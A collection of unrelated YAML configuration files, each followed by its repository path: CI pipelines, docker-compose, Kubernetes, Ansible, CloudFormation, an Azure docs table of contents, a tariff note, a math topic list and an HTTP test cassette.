- name: O que é o Windows Virtual Desktop?
href: ../overview.md
- name: Documentação do Windows Virtual Desktop
href: ../create-host-pools-azure-marketplace.md
- name: Tutoriais
items:
- name: 1. Criar um inquilino
href: tenant-setup-azure-active-directory.md
- name: 2. Criar principais de serviço e atribuições de funções com o PowerShell
href: create-service-principal-role-powershell.md
- name: 3. Criar um conjunto de anfitriões com o Azure Marketplace
href: create-host-pools-azure-marketplace-2019.md
- name: 4. Gerir grupos de aplicações
href: manage-app-groups-2019.md
- name: 5. Criar um conjunto de anfitriões para validar as atualizações de serviço
href: create-validation-host-pool-2019.md
- name: 6. Configurar alertas de serviço
href: set-up-service-alerts-2019.md
- name: Procedimentos
items:
- name: Migrar manualmente
href: ../manual-migration.md
- name: Ligar a recursos do Windows Virtual Desktop
items:
- name: Ligar ao cliente de Ambiente de Trabalho do Windows
href: connect-windows-7-10-2019.md
- name: Ligar com o cliente web
href: connect-web-2019.md
- name: Ligar ao cliente Android
href: connect-android-2019.md
- name: Ligar ao cliente de macOS
href: connect-macos-2019.md
- name: Ligar ao cliente de iOS
href: connect-ios-2019.md
- name: Criar um conjunto de anfitriões e anfitriões de sessões
items:
- name: Modelo Azure Resource Manager
href: create-host-pools-arm-template.md
- name: PowerShell
href: create-host-pools-powershell-2019.md
- name: Implementar uma máquina virtual do Windows 7
href: deploy-windows-7-virtual-machine.md
- name: Implementar um anfitrião de sessões baseado em GPU
href: configure-vm-gpu-2019.md
- name: Expandir um conjunto de anfitriões existente
href: expand-existing-host-pool-2019.md
- name: Configurar as definições do conjunto de anfitriões
items:
- name: Propriedades de RDP
href: customize-rdp-properties-2019.md
- name: Tipo de atribuição de ambiente de trabalho pessoal
href: configure-host-pool-personal-desktop-assignment-type-2019.md
- name: Dimensionar automaticamente os anfitriões de sessão
href: set-up-scaling-script.md
- name: Personalizar o feed
href: customize-feed-virtual-desktop-users-2019.md
- name: Implementar a ferramenta de gestão
items:
- name: Modelo Azure Resource Manager
href: manage-resources-using-ui.md
- name: PowerShell
href: manage-resources-using-ui-powershell.md
- name: Utilizar o diagnóstico do serviço
items:
- name: Implementar a ferramenta de diagnóstico
href: deploy-diagnostics.md
- name: Utilizar o diagnóstico com o Log Analytics
href: diagnostics-log-analytics-2019.md
- name: Publicar aplicações incorporadas
href: publish-apps-2019.md
- name: Configurar o Multi-Factor Authentication do Azure AD
href: ../set-up-mfa.md
- name: Conceitos
items:
- name: Ambiente do Windows Virtual Desktop
href: environment-setup-2019.md
- name: Acesso delegado ao Windows Virtual Desktop
href: delegated-access-virtual-desktop-2019.md
- name: Métodos de balanceamento de carga do agrupamento de anfitriões
href: host-pool-load-balancing-2019.md
- name: Localizações dos dados
href: data-locations-2019.md
- name: Resolução de problemas
items:
- name: 'Descrição geral da resolução de problemas, comentários e suporte'
href: troubleshoot-set-up-overview-2019.md
- name: Identificar e diagnosticar problemas
href: diagnostics-role-service-2019.md
- name: Criação de inquilinos e conjuntos de anfitriões
href: troubleshoot-set-up-issues-2019.md
- name: Configuração da máquina virtual do anfitrião da sessão
href: troubleshoot-vm-configuration-2019.md
- name: Resolver problemas de máquinas virtuais do Windows 7
href: troubleshoot-windows-7-vm.md
- name: Resolver problemas da ferramenta de gestão
href: troubleshoot-management-tool.md
- name: Ligações do serviço de Ambiente de Trabalho Remoto
href: troubleshoot-service-connection-2019.md
- name: Windows Virtual Desktop PowerShell
href: troubleshoot-powershell-2019.md
- name: Referência
items:
- name: PowerShell
href: /powershell/windows-virtual-desktop/overview
- name: API REST
href: /rest/api/virtual-desktop/
|
articles/virtual-desktop/virtual-desktop-fall-2019/TOC.yml
|
name: Dev branch publishing
on:
push:
branches:
- dev
jobs:
dev_branch_publishing:
runs-on: ubuntu-latest
environment: npm-publish
if: github.repository == 'romcal/romcal' && !startsWith(github.event.head_commit.message, 'ci:')
env:
CI: true
GITHUB_USER: github-actions
      GITHUB_EMAIL: github-actions@users.noreply.github.com
steps:
- name: Git checkout dev branch
uses: actions/checkout@v2
with:
ref: dev
token: ${{ secrets.REPO_TOKEN }}
- name: Install node.js and npm
uses: volta-cli/action@v1
- name: Automated version bump
uses: phips28/gh-action-bump-version@master
with:
major-wording: 'MajorBump'
minor-wording: 'MinorBump'
patch-wording: 'PatchBump'
          rc-wording: ''
default: prerelease
preid: dev
skip-commit: 'true'
skip-tag: 'true'
- name: Read package.json
uses: culshaw/read-package-node-version-actions@v1
id: package
- name: Display bumped version
run: 'echo "New romcal version: ${{ steps.package.outputs.version }}"'
- name: Install npm dependencies
run: npm ci --no-audit
- name: Update browsers list (caniuse)
run: npx browserslist@latest --update-db
- name: Build romcal project (romcal + all calendar bundles)
run: npm run build
- name: Run tests
run: npm run test:without-coverage
- name: Commit and tag the updated version
run: |
git config user.name ${{ env.GITHUB_USER }}
git config user.email ${{ env.GITHUB_EMAIL }}
git add .
git commit -m "ci: bump version to ${{ steps.package.outputs.version }}"
git push
git tag v${{ steps.package.outputs.version }}
git push --tags
- name: Npm publish a new 'dev' version (romcal + all calendar bundles)
env:
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
run: node -r ts-node/register scripts/publish.ts
|
.github/workflows/dev-publishing.yml
|
version: '2'
services:
zookeeper:
image: wurstmeister/zookeeper
ports:
- 2181:2181
volumes:
- ./volume/zookeeper/:/var/run/docker.sock
kafka:
image: wurstmeister/kafka
links:
- zookeeper
ports:
- 9092:9092
- 9999:9999
environment:
KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
KAFKA_LISTENERS: OUTSIDE://:9092,INSIDE://:9192
KAFKA_ADVERTISED_LISTENERS: OUTSIDE://127.0.0.1:9092,INSIDE://kafka:9192
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: OUTSIDE:PLAINTEXT,INSIDE:PLAINTEXT
KAFKA_INTER_BROKER_LISTENER_NAME: INSIDE
KAFKA_DELETE_TOPIC_ENABLE: "true"
KAFKA_NUM_PARTITIONS: 3
KAFKA_DEFAULT_REPLICATION_FACTOR: 1
KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
KAFKA_JMX_OPTS: -Dcom.sun.management.jmxremote=true -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.port=9999
KAFKA_JMX_PORT: 9999
volumes:
- ./volume/kafka/:/var/run/docker.sock
zabbix-db:
image: mysql:5.7
environment:
- MYSQL_DATABASE=${DB_NAME}
- MYSQL_USER=${DB_USER}
- MYSQL_PASSWORD=${DB_USER_PASSWORD}
- MYSQL_ROOT_PASSWORD=${DB_ROOT_PASSWORD}
zabbix-server:
image: zabbix/zabbix-server-mysql:${OS}-${VERSION}
environment:
- DB_SERVER_HOST=zabbix-db
- MYSQL_DATABASE=${DB_NAME}
- MYSQL_USER=${DB_USER}
      - MYSQL_PASSWORD=${DB_USER_PASSWORD}
      - MYSQL_ROOT_PASSWORD=${DB_ROOT_PASSWORD}
- ZBX_DEBUGLEVEL=${LOG_LEVEL}
- ZBX_JAVAGATEWAY_ENABLE=true
- ZBX_JAVAGATEWAY=zabbix-java-gw
- ZBX_JAVAGATEWAYPORT=10052
- ZBX_STARTJAVAPOLLERS=5
ports:
- 10051:10051
zabbix-web:
image: zabbix/zabbix-web-apache-mysql:${OS}-${VERSION}
links:
- zabbix-server
- zabbix-db
environment:
- ZBX_SERVER_HOST=zabbix-server
- DB_SERVER_HOST=zabbix-db
- MYSQL_DATABASE=${DB_NAME}
- MYSQL_USER=${DB_USER}
      - MYSQL_PASSWORD=${DB_USER_PASSWORD}
      - MYSQL_ROOT_PASSWORD=${DB_ROOT_PASSWORD}
- PHP_TZ=${TIME_ZONE}
ports:
- ${HTTP_PORT}:80
zabbix-java-gw:
image: zabbix/zabbix-java-gateway:${OS}-${VERSION}
privileged: true
environment:
- ZBX_SERVER_HOST=zabbix-server
expose:
- 10052
links:
- zabbix-server
grafana:
image: grafana/grafana
links:
- zabbix-server
ports:
- 3000:3000
environment:
GF_INSTALL_PLUGINS: alexanderzobnin-zabbix-app
|
docker-compose.yml
|
---
:section: 11
:chapter: 56
:content: "* 1\\. This chapter does not cover:\r\n * (a) wadding, felt or nonwovens,
impregnated, coated or covered with substances or preparations (for example, perfumes
or cosmetics of Chapter 33, soaps or detergents of heading 3401, polishes, creams
or similar preparations of heading 3405, fabric softeners of heading 3809), where
the textile material is present merely as a carrying medium;\r\n * (b) textile
products of heading 5811;\r\n * (c) natural or artificial abrasive powder or grain,
on a backing of felt or nonwovens (heading 6805);\r\n * (d) agglomerated or reconstituted
mica, on a backing of felt or nonwovens (heading 6814);\r\n * (e) metal foil on
a backing of felt or nonwovens (generally Section XIV or Section XV); or\r\n *
(f) sanitary towels (pads) and tampons, napkins (diapers) and napkin liners for
babies, and similar articles, of heading 9619.\r\n* 2\\. The term 'felt' includes
needleloom felt and fabrics consisting of a web of textile fibres the cohesion of
which has been enhanced by a stitch-bonding process using fibres from the web itself.\r\n*
3\\. Headings 5602 and 5603 cover, respectively, felt and nonwovens, impregnated,
coated, covered or laminated with plastics or rubber whatever the nature of these
materials (compact or cellular).\r\n* Heading 5603 also includes nonwovens in which
plastics or rubber forms the bonding substance.\r\n* Headings 5602 and 5603 do not,
however, cover:\r\n * (a) felt impregnated, coated, covered or laminated with plastics
or rubber, containing 50% or less by weight of textile material or felt completely
embedded in plastics or rubber (Chapter 39 or 40);\r\n * (b) nonwovens, either
completely embedded in plastics or rubber, or entirely coated or covered on both
sides with such materials, provided that such coating or covering can be seen with
the naked eye with no account being taken of any resulting change of colour (Chapter
39 or 40); or\r\n * (c) plates, sheets or strips of cellular plastics or cellular
rubber combined with felt or nonwovens, where the textile material is present merely
for reinforcing purposes (Chapter 39 or 40).\r\n* 4\\. Heading 5604 does not cover
textile yarn, or strip or the like of heading 5404 or 5405, in which the impregnation,
coating or covering cannot be seen with the naked eye (usually Chapters 50 to 55);
for the purpose of this provision, no account should be taken of any resulting change
of colour."
|
db/notes/chapters/11_56.yaml
|
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: metrics-server
name: metrics-server
namespace: default
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: metrics-server
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
labels:
app: metrics-server
spec:
containers:
- envFrom:
- configMapRef:
name: cluster-config
env:
- name: JAVA_OPTS
value: "-Xms64m"
- name: cassandra_contactPoints
valueFrom:
configMapKeyRef:
key: CASSANDRA_CONTACTPOINTS
name: arcus-config
- name: cassandra_history_contactPoints
valueFrom:
configMapKeyRef:
key: CASSANDRA_CONTACTPOINTS
name: arcus-config
- name: CASSANDRA_KEYSPACE
valueFrom:
configMapKeyRef:
key: CASSANDRA_KEYSPACE
name: arcus-config
# NOTE(review): removed duplicate 'name: arcus-config' line — duplicate mapping
# keys are invalid YAML (most parsers silently keep the last value).
- name: BOOTSTRAP_SERVERS
  valueFrom:
    configMapKeyRef:
      key: BOOTSTRAP_SERVERS
      name: arcus-config
- name: OPS_BOOTSTRAP_SERVERS
valueFrom:
configMapKeyRef:
key: OPS_BOOTSTRAP_SERVERS
name: arcus-config
- name: KAIROS_URL
value: http://kairosdb-service.default.svc.cluster.local:8080
- name: rollup_defaultTTL
value: '3600'
- name: rollup_mediumTTL
value: '7200'
- name: rollup_highTTL
value: '86400'
image: gcr.io/arcus-238802/arcus/metrics-server:2019.10.0
imagePullPolicy: Always
name: metrics-server
resources:
limits:
cpu: "1"
requests:
cpu: "0.05"
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
|
config/deployments/metrics-server.yml
|
- name: <docker/registry>
debug:
msg: Print tag <docker/registry> for KubeKit Configurator parser
- name: Check all hosts are still available
include_role:
name: precheck
tasks_from: all_hosts_alive
- set_fact:
docker_registry_host_list_item:
- "{{ hostvars[item]['ansible_host']|default('localhost') }}"
- "{{ hostvars[item]['public_ip']|default('127.0.0.1') }}"
- "{{ hostvars[item]['private_ip']|default('127.0.0.1') }}"
- "{{ hostvars[item]['private_dns']|default('localhost') }}"
- "{{ hostvars[item]['public_dns']|default('localhost') }}"
with_items: "{{ groups.master }}"
register: docker_registry_host_list_result
- set_fact:
docker_registry_host_list: "{{ docker_registry_host_list_result.results | map(attribute='ansible_facts.docker_registry_host_list_item') | list }}"
- include_tasks: certs.yml
vars:
docker_registry_host: "{{ item.0 }}:{{ item.1 }}"
with_nested:
- "{{ [ 'localhost', docker_registry_host_list ] | flatten | unique }}"
- ["{{ registry_port }}", "{{ alternative_registry_port }}"]
- include_tasks: certs.yml
vars:
docker_registry_host: "{{ kube_virtual_ip_api }}:{{ item }}"
with_items:
- "{{ registry_port }}"
- "{{ registry_lb_port }}"
- "{{ alternative_registry_port }}"
when:
- is_ha_cluster
- kube_virtual_ip_api is defined
- kube_virtual_ip_api != ''
- block:
- include_tasks: manifest_preload.yml
- include_tasks: registry_image.yml
- name: assert {{ docker_registry_path }} exists
file:
path: "{{ docker_registry_path }}"
state: directory
mode: 0700
- name: render template to /usr/lib/systemd/system/registry.service
template:
src: usr/lib/systemd/system/registry.service.j2
dest: /usr/lib/systemd/system/registry.service
mode: 0644
register: registry_unit
notify: reload and restart registry
# Create the systemd drop-in directories for the docker and registry units.
# (Previous task name wrongly claimed this created '{{ cert_dir }}'.)
- name: ensure systemd drop-in directories exist for docker and registry
  file:
    path: "/etc/systemd/system/{{ item }}.service.d/"
    state: directory
    owner: root
    group: root
    mode: "0755"  # quoted so the mode is passed as an octal string, not an int
  with_items:
    - "docker"
    - "registry"
- name: add docker systemd unit override
template:
src: etc/systemd/system/docker.service.d/docker.conf.j2
dest: /etc/systemd/system/docker.service.d/docker.conf
mode: 0644
notify: reload and restart docker
- name: add registry systemd unit override
copy:
src: etc/systemd/system/registry.service.d/registry.conf
dest: /etc/systemd/system/registry.service.d/registry.conf
mode: 0644
notify: reload and restart registry
- meta: flush_handlers
when: registry_unit.changed
- name: enforce registry running
systemd:
name: registry
state: restarted # need to find a better way to handle cert changes
enabled: yes
- name: Wait up to 2 minutes for docker to stabilize
wait_for:
port: "{{ registry_port }}"
delay: 10
timeout: 120
- name: Check for existing local images
uri:
url: https://localhost:5000/v2/_catalog
return_content: yes
validate_certs: no
client_cert: "{{ cert_dir }}/{{ cert_crt_filename }}"
client_key: "{{ cert_dir }}/{{ cert_key_filename }}"
register: repo
retries: 2
delay: 10
# repo loading could be done in one step with the ansible docker image
# module, but the module depends on pydocker on the remote nodes
- block:
- set_fact:
images_to_registry: "{{ images_to_registry|default([]) + item.value.values() }}"
with_items: "{{ current_manifest.dependencies | dict2items }}"
- include_tasks: images.yml
loop: "{{ images_to_registry }}"
loop_control:
label: "{{ image['name'] }}"
loop_var: image
tags:
- load_images_to_registry
when: "'master' in group_names"
- name: </docker/registry>
debug:
msg: Print tag </docker/registry> for KubeKit Configurator parser
|
pkg/configurator/templates/ansible/roles/docker/registry/tasks/main.yml
|
# 1.
Fundamentals:
group representation: ''
homomorphism of representations: ''
left(/right)-regular representation: ''
adjoint representation: ''
group algebra: ''
G-linear projection: ''
subrepresentation: ''
quotient representation: ''
irreducible representation: ''
first isomorphism theorem of representations: ''
# 2.
Maschke's and Schur's:
decomposable: ''
semisimple: ''
Maschke's theorem: ''
representations of cyclic groups: ''
Schur's lemma: ''
uniqueness of decomposition: ''
representations of Abelian groups: ''
1-dimensional representations from Abelianisation: ''
# 3.
Decomposition of representations:
sum of squares formula: ''
G-invariant subspace: ''
averaging map: ''
number of irreducible subrepresentations equals the number of conjugacy classes: ''
# 4.
Tensor product and dual representation:
free vector space: ''
tensor product of vector spaces: ''
universal property of the tensor product: ''
basis of the tensor product: ''
tensor product of representations: ''
dual representation: ''
Kronecker product: ''
external tensor product of representations: ''
irreducibility of the external tensor product of representations: ''
# 5.
Character theory:
character: ''
class function: ''
inner product on class functions: ''
characters of irreducible representation are orthonormal: ''
two representations are isomorphic iff they have the same character: ''
character table: ''
every normal subgroup is an intersection of kernels of irreducible representations: ''
commutator subgroup is the intersection of the kernels of 1-dimensional representations: ''
# 6.
Algebra and modules:
ℂ-algebra: ''
left-module: ''
submodule: ''
simple: ''
semisimple module: ''
decomposable: ''
quotient module: ''
homomorphism of modules: ''
first isomorphism theorem for modules: ''
Schur's lemma for modules: ''
direct sum of modules: ''
finite dimensional left-module isomorphic to matrix algebra: ''
semisimple algebra: ''
Artin-Wedderburn theorem: ''
characters of modules: ''
Hochschild traces: ''
two modules over a finite-dimensional semisimple algebra are isomorphic iff they have the same character: ''
characters of simple left-modules of a finite-dimensional algebra form a basis in the space of Hochschild traces: ''
|
Y3/group-representation.yaml
|
pool:
vmImage: 'windows-latest'
# Build Variables
variables:
DOTNET_SKIP_FIRST_TIME_EXPERIENCE: 1
Prerelease: 'ci'
BuildConfiguration: 'Release'
# CI Trigger on master branch
trigger:
batch: false
branches:
include:
- master
paths:
exclude:
- docs/*
- '**/*.md'
# Trigger builds for PR's targeting master
pr:
branches:
include:
- master
paths:
exclude:
- docs/*
- '**/*.md'
steps:
- task: UseDotNet@2
displayName: 'Install .NET 5.0.x'
inputs:
packageType: 'sdk'
version: '5.0.x'
includePreviewVersions: true
- task: UseDotNet@2
displayName: 'Install .NET 3.0.x'
inputs:
packageType: 'sdk'
version: '3.0.x'
- task: SonarCloudPrepare@1
displayName: 'SonarQube Preparation'
inputs:
SonarCloud: 'SonarCloud'
organization: 'barclayadam'
scannerMode: 'MSBuild'
projectKey: barclayadam_blueprint
projectName: Blueprint
- task: DotNetCoreCLI@2
displayName: 'dotnet restore'
inputs:
command: 'restore'
- task: DotNetCoreCLI@2
displayName: 'dotnet build'
inputs:
command: 'build'
arguments: '--configuration $(BuildConfiguration) -p:Prerelease=$(Prerelease) --no-restore'
- task: DotNetCoreCLI@2
displayName: 'dotnet test'
inputs:
command: 'test'
arguments: '--configuration $(BuildConfiguration) -p:Prerelease=$(Prerelease) --no-build --no-restore --collect "Code coverage"'
- task: DotNetCoreCLI@2
displayName: 'dotnet pack'
inputs:
command: 'pack'
outputDir: '$(Build.ArtifactStagingDirectory)/.nupkgs'
verbosityPack: 'minimal'
nobuild: true
condition: and(succeeded(), ne(variables['Build.Reason'], 'PullRequest'))
- task: DotNetCoreCLI@2
displayName: 'dotnet push'
inputs:
command: 'push'
packagesToPush: '$(Build.ArtifactStagingDirectory)/.nupkgs/*.nupkg'
nuGetFeedType: 'internal'
publishVstsFeed: '91817c8d-b32d-4cea-8df3-57127121c593/1252a847-6abc-49a4-80ad-001f8ee7fd4c'
allowPackageConflicts: true
condition: and(succeeded(), ne(variables['Build.Reason'], 'PullRequest'))
- task: SonarCloudAnalyze@1
displayName: 'SonarCloud analysis'
- task: SonarCloudPublish@1
displayName: 'Publish SonarCloud results'
inputs:
pollingTimeoutSec: '300'
|
azure-pipelines.yml
|
variables:
ARTIFACT_NAME: cars-api-v$CI_PIPELINE_IID.jar
# $CI_PIPELINE_IID for version control (unique id)
APP_NAME: cars-api
stages:
- build
- test
- deploy
- post deploy
- publishing
build:
stage: build
image: openjdk:12-alpine
script:
- sed -i "s/CI_PIPELINE_IID/$CI_PIPELINE_IID/" ./src/main/resources/application.yml
- sed -i "s/CI_COMMIT_SHORT_SHA/$CI_COMMIT_SHORT_SHA/" ./src/main/resources/application.yml
- sed -i "s/CI_COMMIT_BRANCH/$CI_COMMIT_BRANCH/" ./src/main/resources/application.yml
# changing application information with gitlab ci/cd
- ./gradlew build
- mv ./build/libs/cars-api.jar ./build/libs/$ARTIFACT_NAME
# move the file (with new version name)
artifacts:
paths:
- ./build/libs/
smoke test:
stage: test
image: openjdk:12-alpine
before_script:
- apk --no-cache add curl
# Installing curl
script:
- java -jar ./build/libs/$ARTIFACT_NAME &
# build jar file
- sleep 30
- curl http://localhost:5000/actuator/health | grep "UP"
# search for specific string | create an input for next command
code quality:
stage: test
image: openjdk:12-alpine
script:
- ./gradlew pmdMain pmdTest
# static test for codes in Main and Test
artifacts:
when: always
# even if job fails we want to see the reports
paths:
- build/reports/pmd
# reports saved as artifacts
unit tests:
stage: test
image: openjdk:12-alpine
script:
- ./gradlew test
# executes test command
artifacts:
when: always
# even if job fails we want to see the reports
paths:
- build/reports/tests
# reports saved as artifacts
reports:
junit: build/test-results/test/*.xml
# all reports saved as xml file
deploy:
stage: deploy
image:
name: banst/awscli
# that is an image that includes AWS cli
entrypoint: [""]
# override entry point - no entry point
before_script:
- apk --no-cache add curl
# install curl
- apk --no-cache add jq
# parser of JSON file
script:
- aws configure set region us-east-2
# defining aws region
- aws s3 cp ./build/libs/$ARTIFACT_NAME s3://$S3_BUCKET/$ARTIFACT_NAME
# copying jar file from folder to S3 bucket, $S3_BUCKET is defined as environment variable in Gitlab
- aws elasticbeanstalk create-application-version --application-name $APP_NAME --version-label $CI_PIPELINE_IID --source-bundle S3Bucket=$S3_BUCKET,S3Key=$ARTIFACT_NAME
# create application version (NOT ACTIVE) $APP_NAME = cars-api and specify the jar file location in S3
- CNAME=$(aws elasticbeanstalk update-environment --application-name $APP_NAME --environment-name "Carsapi-env" --version-label=$CI_PIPELINE_IID | jq '.CNAME' --raw-output)
# for activating version and getting domain name and assign in CNAME
- sleep 50
- curl http://$CNAME/actuator/info | grep $CI_PIPELINE_IID
# checking version
- curl http://$CNAME/actuator/health | grep "UP"
# checking health of application
api testing:
stage: post deploy
image:
name: vdespa/newman
entrypoint: [""]
script:
- newman --version
- newman run "Cars API.postman_collection.json" --environment production.postman_environment.json --reporters cli,htmlextra,junit --reporter-htmlextra-export "newman/report.html" --reporter-junit-export "newman/report.xml"
artifacts:
when: always
paths:
- newman/
reports:
junit: newman/report.xml
pages:
stage: publishing
script:
- mkdir public
- mv newman/report.html public/index.html
artifacts:
paths:
- public
|
.gitlab-ci.yml
|
---
http_interactions:
- request:
method: get
uri: http://ergast.com/api/f1/1950.json
body:
encoding: US-ASCII
string: ''
headers:
Accept-Encoding:
- gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept:
- "*/*"
User-Agent:
- Ruby
Host:
- ergast.com
response:
status:
code: 200
message: OK
headers:
Date:
- Sat, 22 Jul 2017 14:23:12 GMT
Server:
- Apache/2.2.15 (CentOS)
X-Powered-By:
- PHP/5.3.3
Access-Control-Allow-Origin:
- "*"
Content-Length:
- '2754'
Content-Type:
- application/json; charset=utf-8
X-Cache:
- MISS from cache_server
X-Cache-Lookup:
- MISS from cache_server:3128
Via:
- 1.0 cache_server:3128 (squid/2.6.STABLE21)
Connection:
- close
body:
encoding: UTF-8
string: '{"MRData":{"xmlns":"http:\/\/ergast.com\/mrd\/1.4","series":"f1","url":"http://ergast.com/api/f1/1950.json","limit":"30","offset":"0","total":"7","RaceTable":{"season":"1950","Races":[{"season":"1950","round":"1","url":"http:\/\/en.wikipedia.org\/wiki\/1950_British_Grand_Prix","raceName":"British
Grand Prix","Circuit":{"circuitId":"silverstone","url":"http:\/\/en.wikipedia.org\/wiki\/Silverstone_Circuit","circuitName":"Silverstone
Circuit","Location":{"lat":"52.0786","long":"-1.01694","locality":"Silverstone","country":"UK"}},"date":"1950-05-13"},{"season":"1950","round":"2","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Monaco_Grand_Prix","raceName":"Monaco
Grand Prix","Circuit":{"circuitId":"monaco","url":"http:\/\/en.wikipedia.org\/wiki\/Circuit_de_Monaco","circuitName":"Circuit
de Monaco","Location":{"lat":"43.7347","long":"7.42056","locality":"Monte-Carlo","country":"Monaco"}},"date":"1950-05-21"},{"season":"1950","round":"3","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Indianapolis_500","raceName":"Indianapolis
500","Circuit":{"circuitId":"indianapolis","url":"http:\/\/en.wikipedia.org\/wiki\/Indianapolis_Motor_Speedway","circuitName":"Indianapolis
Motor Speedway","Location":{"lat":"39.795","long":"-86.2347","locality":"Indianapolis","country":"USA"}},"date":"1950-05-30"},{"season":"1950","round":"4","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Swiss_Grand_Prix","raceName":"Swiss
Grand Prix","Circuit":{"circuitId":"bremgarten","url":"http:\/\/en.wikipedia.org\/wiki\/Circuit_Bremgarten","circuitName":"Circuit
Bremgarten","Location":{"lat":"46.9589","long":"7.40194","locality":"Bern","country":"Switzerland"}},"date":"1950-06-04"},{"season":"1950","round":"5","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Belgian_Grand_Prix","raceName":"Belgian
Grand Prix","Circuit":{"circuitId":"spa","url":"http:\/\/en.wikipedia.org\/wiki\/Circuit_de_Spa-Francorchamps","circuitName":"Circuit
de Spa-Francorchamps","Location":{"lat":"50.4372","long":"5.97139","locality":"Spa","country":"Belgium"}},"date":"1950-06-18"},{"season":"1950","round":"6","url":"http:\/\/en.wikipedia.org\/wiki\/1950_French_Grand_Prix","raceName":"French
Grand Prix","Circuit":{"circuitId":"reims","url":"http:\/\/en.wikipedia.org\/wiki\/Reims-Gueux","circuitName":"Reims-Gueux","Location":{"lat":"49.2542","long":"3.93083","locality":"Reims","country":"France"}},"date":"1950-07-02"},{"season":"1950","round":"7","url":"http:\/\/en.wikipedia.org\/wiki\/1950_Italian_Grand_Prix","raceName":"Italian
Grand Prix","Circuit":{"circuitId":"monza","url":"http:\/\/en.wikipedia.org\/wiki\/Autodromo_Nazionale_Monza","circuitName":"Autodromo
Nazionale di Monza","Location":{"lat":"45.6156","long":"9.28111","locality":"Monza","country":"Italy"}},"date":"1950-09-03"}]}}}'
http_version:
recorded_at: Sat, 22 Jul 2017 13:30:56 GMT
recorded_with: VCR 3.0.3
|
vcr_cassettes/season_cassette.yml
|
AWSTemplateFormatVersion: 2010-09-09
Parameters:
StageName:
Type: String
Description: Represents a unique identifier for a version of a deployed RestApi that is callable by users.
Resources:
LambdaFunction:
Type: AWS::Lambda::Function
Properties:
Code:
S3Bucket: <BUCKET_NAME>
S3Key: <BUCKET_KEY>
Description: Sample Lambda
FunctionName: SampleLambda
Handler: main
MemorySize: 128
Role: !GetAtt LambdaFunctionRole.Arn
Runtime: go1.x
Timeout: 10
LambdaFunctionRole:
Type: AWS::IAM::Role
Properties:
RoleName: SampleLambdaRole
AssumeRolePolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Action: sts:AssumeRole
Principal:
Service:
- lambda.amazonaws.com
Path: '/'
ManagedPolicyArns:
# This gives your Lambda permission to use AWS X-Ray
- arn:aws:iam::aws:policy/AWSXrayWriteOnlyAccess
# Uncomment this if the Lambda is in a VPC
# - arn:aws:iam::aws:policy/service-role/AWSLambdaVPCAccessExecutionRole
ApiGateway:
Type: AWS::ApiGateway::RestApi
Properties:
Name: SampleAPIGateway
Description: Sample API Gateway
EndpointConfiguration:
Types:
# For a regional API and its custom domain name.
- REGIONAL
# For a private API.
# - PRIVATE
# For an edge-optimized API and its custom domain name.
# - EDGE
Body:
Fn::Transform:
Name: AWS::Include
Parameters:
Location: !Sub s3://path/to/swagger.yaml
ApiGatewayAccount:
Type: AWS::ApiGateway::Account
Properties:
CloudWatchRoleArn: !GetAtt ApiGatewayRole.Arn
ApiGatewayRole:
Type: AWS::IAM::Role
Properties:
RoleName: SampleApiGatewayCloudWatchRole
AssumeRolePolicyDocument:
Version: '2012-10-17'
Statement:
# NOTE(review): repaired the garbled service principal — API Gateway assumes
# this role via the 'apigateway.amazonaws.com' service principal.
- Effect: Allow
  Action: sts:AssumeRole
  Principal:
    Service:
      - apigateway.amazonaws.com
Path: '/'
ManagedPolicyArns:
- 'arn:aws:iam::aws:policy/service-role/AmazonAPIGatewayPushToCloudWatchLogs'
ApiGatewayStage:
  Type: AWS::ApiGateway::Stage
  # Must wait for the account-level CloudWatch role to be wired up, otherwise
  # stage creation with logging enabled fails. The resource in this template is
  # named 'ApiGatewayAccount' — the previous 'ApiAccount' reference did not
  # exist and would fail template validation.
  DependsOn:
    - ApiGatewayAccount
  Properties:
    DeploymentId: !Ref ApiGatewayDeployment
    MethodSettings:
      - DataTraceEnabled: true
        HttpMethod: '*'
        LoggingLevel: INFO
        ResourcePath: /*
    RestApiId: !Ref ApiGateway
    StageName: !Ref StageName
ApiGatewayDeployment:
Type: AWS::ApiGateway::Deployment
Properties:
RestApiId: !Ref ApiGateway
|
template.yaml
|
# Enable submodules
variables:
GIT_STRATEGY: clone
GIT_SUBMODULE_STRATEGY: recursive
linux-tool:
stage: build-and-test
script:
- make riscos-build-online
- make test
artifacts:
when: always
paths:
- riscos-build-online
tags:
- linux
linux-deb:
stage: package
script:
- make deb
artifacts:
when: always
paths:
- riscos-build-online_*.deb
tags:
- linux
riscos-tool:
stage: build-and-test
script:
# FIXME: With a bit of thought I could replace the curl running of the build with
# an invocation of the tool that we just built.
- |
set -o pipefail
mkdir /tmp/robuild
# Zip up the source to send to robuild
zip -q9r /tmp/source-archive.zip * .robuild.yaml
# Send the archive file to JFPatch as a service
curl -q -F 'source=@/tmp/source-archive.zip' -o /tmp/robuild/result.json https://json.build.riscos.online/build/json
# Extract any system messages and output
jq -r '.messages[]' /tmp/robuild/result.json > /tmp/robuild/messages.txt || { echo "Server response:" ; cat /tmp/robuild/result.json ; false ; }
jq -r 'reduce .output[] as $i ("";. + $i)' /tmp/robuild/result.json > /tmp/robuild/output.txt
# Extract return code
rc=$(jq -r .rc /tmp/robuild/result.json | tee /tmp/robuild/rc.json)
# Marker files for the state
if [ "$rc" != "0" ] ; then touch /tmp/robuild/failed ; else touch /tmp/robuild/ok ; fi
# Extract the built binary if we had any
if [ "$rc" = "0" ] ; then
jq -r .data /tmp/robuild/result.json | base64 --decode - > /tmp/robuild/built
fi
# Outputs:
